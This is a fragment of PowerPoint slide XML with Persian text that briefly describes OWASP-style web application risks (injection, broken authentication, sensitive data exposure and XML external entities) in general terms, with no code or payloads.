                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>خطرهای امنیتی برنامه کاربردی</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>–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9" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کاستی</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> تزریق، مانند</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، و تزریق</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>زمانی رخ می</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>دهد که داده</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های نامعتبر به عنوان بخشی از فرمان یا پرس و جو </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به مفسر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ارسال شوند. داده</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های خصمانه مهاجم می</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تواند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مفسر</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> را </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>منجر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به اجرای دستورات غیرمنتظره یا دسترسی به داده</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها بدون مجوز مناسب </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بکند. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Freeform 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AB65A7-CD59-4B0C-BAB0-A853DD609B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="1082570"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>تزریق</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1" name="Freeform 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="2011866"/>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algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>توابع کاربردی مربوط به احراز هویت و مدیریت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نشست</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> اغلب به اشتباه اجرا می</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شوند،</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> و</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> به مهاجم</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌ها</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> اجازه می</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>دهند رمزهای عبور، کلید</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها یا توکن</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نشست</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> را به خطر بیندازد یا از سایر نقص</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های پیاده</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سازی برای </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بهره‌برداری از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>هویت</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های دیگر کاربران (به طور موقت یا دائمی) استفاده کنند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56513DEF-2444-40AD-AE64-66E7CC6256D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="1952466"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>احراز هویت ناقص</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3" name="Freeform 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0014DB-969D-4359-A7D1-99F0AAA09C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="2854763"/>
            <a:ext cx="5218177" cy="66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algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بسیاری از برنامه</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های کاربردی وب و </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها از اطلاعات حساس مانند مالی، خدمات درمانی و</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به درستی محافظت نمی</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کنند. مهاجمان ممکن است اطلاعاتی را که برای محافظت از کارت اعتباری، سرقت هویت، و یا سایر جرایم مورد استفاده قرار می</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>گیرد، سرقت و یا تغییر دهند. اطلاعات حساس مستلزم حفاظت اضافی، مانند رمزگذاری در حالت ساکن یا در هنگام حمل و نقل، و همچنین اقدامات احتیاطی خاص هنگام ردیابی با مرورگر هستند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Freeform 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF109756-C917-4ECB-9826-AC54F0948B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="282236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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>افشای اطلاعات حساس</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5" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A0868A-364E-4487-8030-7C4BD69D47DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="3793295"/>
            <a:ext cx="5218177" cy="532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algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بسیاری از پردازنده</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های قدیمی</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تر یا ضعیف پیکربندی شده </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، ارجاعات </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>موجودیت خارجی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را در اسناد</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ارزیابی می</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کنند. می توان از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>موجودیت خارجی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برای افشای فایل</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های داخلی با استفاده از فایل مدیریت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، اشتراک فایل های داخلی، اسکن پورت داخلی، اجرای کد از راه دور و حملات انکار سرویس، مانند حمله </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Billion Laughs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>استفاده کرد.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Freeform 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3635AA73-30CD-4FEB-BBAF-A9AD20490C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="3694295"/>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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F57B3B-227A-4B44-B219-FB6A81F17116}"/>
              </a:ext>
            </a:extLst>
